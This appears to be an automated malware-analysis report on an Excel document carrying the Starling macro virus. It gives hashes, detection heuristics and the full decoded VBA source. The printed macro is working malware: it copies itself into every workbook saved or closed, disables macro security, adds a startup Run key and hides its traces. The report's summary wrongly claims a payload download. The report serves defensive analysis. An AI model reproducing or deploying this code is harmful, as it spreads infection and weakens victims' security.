Office (OLE) malware analysis — malicious · a439f0a36cabbadb

MALICIOUS

Office (OLE)

26.0 KB Created: 2005-02-25 07:29:54 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: 00bb1282724d8991cae75c2ec334b1ce SHA-1: 87237f5bfc5b134f43785c5f7f8dfe6e24b65975 SHA-256: a439f0a36cabbadb252b19e9566052a84220498345c2e0ea2de587917b3e1b7e

268 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1037.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

This Excel document contains a Workbook_Open macro that is designed to execute malicious code. The macro attempts to create a file named 'yinyin3345.vbs' in the 'c:\windows\system\HappyBirthday' directory and potentially save itself as an add-in named 'yinyin3345.xls'. The use of WScript.Shell and the Shell() function indicates an intent to download and execute a second-stage payload, likely disguised as 'yinyin3345.vbs'.

Heuristics 7

ClamAV: Xls.Trojan.Starling-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Starling-2
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

  Set Fso = CreateObject("scripting.filesystemobject")
  Set WshShell = CreateObject("WScript.Shell")
  On Error Resume Next

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

  Dim File
  Set Fso = CreateObject("scripting.filesystemobject")
  Set WshShell = CreateObject("WScript.Shell")

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro

Matched line in script

Private Const MYTEXT As String = "c:\windows\system\HappyBirthday"
Private Sub Workbook_Open()
  Dim DarlingPath As String

Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6882 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6882 bytes
SHA-256: `030ad55b02ad389a5c48b4b459e801f79ab17ac486e38d478da4152e50c99340`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Private WithEvents App As Application Attribute App.VB_VarHelpID = -1 Private Const Darling As String = "yinyin3345.xls" Private Const StartLove As String = "yinyin3345.vbs" Private Const MYTEXT As String = "c:\windows\system\HappyBirthday" Private Sub Workbook_Open() Dim DarlingPath As String Dim StartPath As String Dim DarlingBook As Workbook Dim Fullpath As String Dim ExistFlag On Error Resume Next Call Hide Call CreateFile StartPath = Application.StartupPath Fullpath = UCase$(StartPath + "\" + Darling) ExistFlag = Len(Dir$(Fullpath)) If UCase$(Me.FullName) = Fullpath Then Set App = Application ElseIf (ExistFlag = 0) Then Application.ScreenUpdating = False If Len(Dir(StartPath, vbDirectory)) = 0 Then MkDir StartPath End If Set DarlingBook = Application.Workbooks.Add DarlingBook.IsAddin = True HurtWbk DarlingBook 'DarlingBook.SaveAs Fullpath, xlNormal DarlingBook.SaveAs Fullpath, xlAddIn DarlingBook.Close Application.ScreenUpdating = True Else End If End Sub Private Sub App_WorkbookBeforeSave(ByVal Wbk As Excel.Workbook, ByVal SaveAsUI As Boolean, Cancel As Boolean) On Error Resume Next HurtWbk Wbk End Sub Private Sub App_WorkbookBeforeClose(ByVal Wbk As Excel.Workbook, Cancel As Boolean) On Error Resume Next If Len(Wbk.Path) <> 0 Then If HurtWbk(Wbk) Then Wbk.Save Wbk.Saved = True End If End If End Sub Private Function HurtWbk(Wbk As Workbook) As Boolean Dim Source As Object Dim Target As Object Dim FindResult As Boolean On Error Resume Next HurtWbk = False Set Source = Me.VBProject.VBComponents("ThisWorkbook").CodeModule Set Target = Wbk.VBProject.VBComponents("ThisWorkbook").CodeModule FindResult = Wbk.VBProject.VBComponents("ThisWorkBook").CodeModule.Find("yinyin3345.xls", 1, 1, 10, 30, False, False) '查看目标文件是否已带毒 If FindResult = False Then Target.DeleteLines 1, Source.CountOfLines Target.AddFromString Source.Lines(1, Source.CountOfLines) End If End Function Sub Hide() Dim Con Dim WshShell Dim Fullpath As String Dim Fso Dim File Set Fso = CreateObject("scripting.filesystemobject") Set WshShell = CreateObject("WScript.Shell") On Error Resume Next For Each File In Application.RecentFiles If InStr(File.Name, "yinyin3345.xls") > 0 Then Fso.deletefile File.Path End If Next File On Error Resume Next Fullpath = WshShell.specialfolders("recent") & "\yinyin~1.lnk" If Len(Dir$(Fullpath)) > 0 Then Fso.deletefile Fullpath End If Fullpath = WshShell.specialfolders("Templates") & "\Software\yinyin3345.vbs" WshShell.RegWrite "HKCU\Software\Microsoft\Office\9.0\excel\Security\Level", 1, "REG_DWORD" WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\internet.exe", Fullpath On Error Resume Next For Each Con In Application.CommandBars("tools").Controls If Left$(Con.Caption, 1) = "宏" Then Con.Enabled = False Exit For End If Next Con On Error Resume Next For Each Con In Application.CommandBars("macro").Controls Con.Enabled = False Con.Visible = False Next Con End Sub Sub CreateFile() Dim Fso, Source Dim Wsh Dim Myfolder Dim FileName, i, Text Set Fso = CreateObject("scripting.filesystemobject") Set Wsh = CreateObject("wscript.shell") Myfolder = Wsh.specialfolders("Templates") & "\Software\" Set Source = Me.VBProject.VBComponents("ThisWorkbook").CodeModule If Not Fso.folderexists(Myfolder) Then Fso.createfolder Myfolder End If FileName = Myfolder & StartLove Open FileName For Output As #1 Print #1, "Dim Fso,Wsh,Cell,myBook,MyText" Print #1, "Set Fso = CreateObject(" & Chr(34) & "scripting.filesystemobject"; Chr(34); ")" Print #1, "Set wsh = CreateObject(" & Chr(34) & "wscript.shell"; Chr(34); ")" Print #1, "Set cell = CreateObject(" & Chr(34) & "excel.application" & Chr(34) & ")" Print #1, "if Fso.fileexists(cell.StartupPath + " & Chr(34) & "\yinyin3345.xls" & Chr(34) & ") = false then" Print #1, "Set Mybook = cell.Workbooks.Add" Print #1, "Mybook.IsAddin = True" Print #1, "Mybook.VBProject.VBComponents(" & Chr(34) & "ThisWorkbook" & Chr(34) & ").CodeModule.addfromfile " & Chr(34) & "c:\windows\system\happybirthday" & Chr(34) Print #1, "Mybook.SaveAs UCase(cell.StartupPath + " & Chr(34) & "\yinyin3345.xls" & Chr(34) & "), 18" Print #1, "Mybook.Close" Print #1, "Set cell = Nothing" Print #1, "end if" Print #1, "If Month(Date) = 11 And Day(Date) = 4 Then" Print #1, "MsgBox " & Chr(34) & "祝MS.YINYIN3345小姐和MR.myfrien4061生日快乐!!!!!!!!" & Chr(34) & ", vbOKOnly," & Chr(34) & "YINYIN3345友情提示" & Chr(34) Print #1, "Fso.deletefile wsh.specialfolders(" & Chr(34) & "Templates" & Chr(34) & ") & " & Chr(34) & "\software\yinyin3345.vbs" & Chr(34) Print #1, "elseif weekday(date)= 5 then" Print #1, "MsgBox " & Chr(34) & "您的电脑如果出现不能上网的问题，请和系统管理员联系。" & Chr(34) & ", vbOKOnly," & Chr(34) & "YINYIN3345友情提示" & Chr(34) Print #1, "Fso.deletefile wsh.specialfolders(" & Chr(34) & "Templates" & Chr(34) & ") & " & Chr(34) & "\software\yinyin3345.vbs" & Chr(34) Print #1, "else" Print #1, "end if" Print #1, "set fso = nothing" Print #1, "set wsh = nothing" Close #1 Open MYTEXT For Output As #1 Print #1, Source.Lines(1, Source.CountOfLines) Close #1 Set Source = Nothing End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 030ad55b02ad389a5c48b4b459e801f79ab17ac486e38d478da4152e50c99340

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Option Explicit
Private WithEvents App As Application
Attribute App.VB_VarHelpID = -1


Private Const Darling As String = "yinyin3345.xls"
Private Const StartLove As String = "yinyin3345.vbs"
Private Const MYTEXT As String = "c:\windows\system\HappyBirthday"
Private Sub Workbook_Open()
  Dim DarlingPath As String
  Dim StartPath As String
  Dim DarlingBook As Workbook
  Dim Fullpath As String
  Dim ExistFlag
  On Error Resume Next
  Call Hide
  Call CreateFile
  StartPath = Application.StartupPath
  Fullpath = UCase$(StartPath + "\" + Darling)
  ExistFlag = Len(Dir$(Fullpath))
  
  If UCase$(Me.FullName) = Fullpath Then
    Set App = Application
  ElseIf (ExistFlag = 0) Then
    Application.ScreenUpdating = False
    If Len(Dir(StartPath, vbDirectory)) = 0 Then
       MkDir StartPath
    End If
    Set DarlingBook = Application.Workbooks.Add
    DarlingBook.IsAddin = True
    HurtWbk DarlingBook
    'DarlingBook.SaveAs Fullpath, xlNormal
    DarlingBook.SaveAs Fullpath, xlAddIn
    DarlingBook.Close
    Application.ScreenUpdating = True
  Else
  End If
End Sub
Private Sub App_WorkbookBeforeSave(ByVal Wbk As Excel.Workbook, ByVal SaveAsUI As Boolean, Cancel As Boolean)
  On Error Resume Next
  HurtWbk Wbk
End Sub
Private Sub App_WorkbookBeforeClose(ByVal Wbk As Excel.Workbook, Cancel As Boolean)
  On Error Resume Next
  If Len(Wbk.Path) <> 0 Then
    If HurtWbk(Wbk) Then
      Wbk.Save
      Wbk.Saved = True
      
    End If
  End If
End Sub
Private Function HurtWbk(Wbk As Workbook) As Boolean
  Dim Source As Object
  Dim Target As Object
  Dim FindResult As Boolean
  On Error Resume Next
  HurtWbk = False
  Set Source = Me.VBProject.VBComponents("ThisWorkbook").CodeModule
  Set Target = Wbk.VBProject.VBComponents("ThisWorkbook").CodeModule
  FindResult = Wbk.VBProject.VBComponents("ThisWorkBook").CodeModule.Find("yinyin3345.xls", 1, 1, 10, 30, False, False) '查看目标文件是否已带毒
  If FindResult = False Then
    Target.DeleteLines 1, Source.CountOfLines
    Target.AddFromString Source.Lines(1, Source.CountOfLines)
    
  End If
  
End Function

Sub Hide()
  Dim Con
  Dim WshShell
  Dim Fullpath As String
  Dim Fso
  Dim File
  Set Fso = CreateObject("scripting.filesystemobject")
  Set WshShell = CreateObject("WScript.Shell")
  On Error Resume Next
  For Each File In Application.RecentFiles
     If InStr(File.Name, "yinyin3345.xls") > 0 Then
        Fso.deletefile File.Path
     End If
  Next File
  On Error Resume Next
  Fullpath = WshShell.specialfolders("recent") & "\yinyin~1.lnk"
  If Len(Dir$(Fullpath)) > 0 Then
    Fso.deletefile Fullpath
  End If
  Fullpath = WshShell.specialfolders("Templates") & "\Software\yinyin3345.vbs"
  WshShell.RegWrite "HKCU\Software\Microsoft\Office\9.0\excel\Security\Level", 1, "REG_DWORD"
  WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\internet.exe", Fullpath
  On Error Resume Next
  For Each Con In Application.CommandBars("tools").Controls
    If Left$(Con.Caption, 1) = "宏" Then
      Con.Enabled = False
      Exit For
    End If
  Next Con
  On Error Resume Next
  For Each Con In Application.CommandBars("macro").Controls
    Con.Enabled = False
    Con.Visible = False
  Next Con
End Sub

Sub CreateFile()
  Dim Fso, Source
  Dim Wsh
  Dim Myfolder
  Dim FileName, i, Text
  Set Fso = CreateObject("scripting.filesystemobject")
  Set Wsh = CreateObject("wscript.shell")
  Myfolder = Wsh.specialfolders("Templates") & "\Software\"
  Set Source = Me.VBProject.VBComponents("ThisWorkbook").CodeModule
  If Not Fso.folderexists(Myfolder) Then
    Fso.createfolder Myfolder
  End If
  FileName = Myfolder & StartLove
  Open FileName For Output As #1
  Print #1, "Dim Fso,Wsh,Cell,myBook,MyText"
  Print #1, "Set Fso = CreateObject(" & Chr(34) & "scripting.filesystemobject"; Chr(34); ")"
  Print #1, "Set wsh = CreateObject(" & Chr(34) & "wscript.shell"; Chr(34); ")"
  Print #1, "Set cell = CreateObject(" & Chr(34) & "excel.application" & Chr(34) & ")"
  Print #1, "if Fso.fileexists(cell.StartupPath + " & Chr(34) & "\yinyin3345.xls" & Chr(34) & ") = false then"
  Print #1, "Set Mybook = cell.Workbooks.Add"
  Print #1, "Mybook.IsAddin = True"
  Print #1, "Mybook.VBProject.VBComponents(" & Chr(34) & "ThisWorkbook" & Chr(34) & ").CodeModule.addfromfile " & Chr(34) & "c:\windows\system\happybirthday" & Chr(34)
  Print #1, "Mybook.SaveAs UCase(cell.StartupPath + " & Chr(34) & "\yinyin3345.xls" & Chr(34) & "), 18"
  Print #1, "Mybook.Close"
  Print #1, "Set cell = Nothing"
  Print #1, "end if"
  Print #1, "If Month(Date) = 11 And Day(Date) = 4 Then"
  Print #1, "MsgBox " & Chr(34) & "祝MS.YINYIN3345小姐和MR.myfrien4061生日快乐!!!!!!!!" & Chr(34) & ", vbOKOnly," & Chr(34) & "YINYIN3345友情提示" & Chr(34)
  Print #1, "Fso.deletefile wsh.specialfolders(" & Chr(34) & "Templates" & Chr(34) & ") &  " & Chr(34) & "\software\yinyin3345.vbs" & Chr(34)
  Print #1, "elseif weekday(date)= 5 then"
  Print #1, "MsgBox " & Chr(34) & "您的电脑如果出现不能上网的问题，请和系统管理员联系。" & Chr(34) & ", vbOKOnly," & Chr(34) & "YINYIN3345友情提示" & Chr(34)
  Print #1, "Fso.deletefile wsh.specialfolders(" & Chr(34) & "Templates" & Chr(34) & ") &  " & Chr(34) & "\software\yinyin3345.vbs" & Chr(34)
  Print #1, "else"
  Print #1, "end if"
  Print #1, "set fso = nothing"
  Print #1, "set wsh = nothing"
  Close #1
  Open MYTEXT For Output As #1
  Print #1, Source.Lines(1, Source.CountOfLines)
  Close #1
  Set Source = Nothing
End Sub




Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.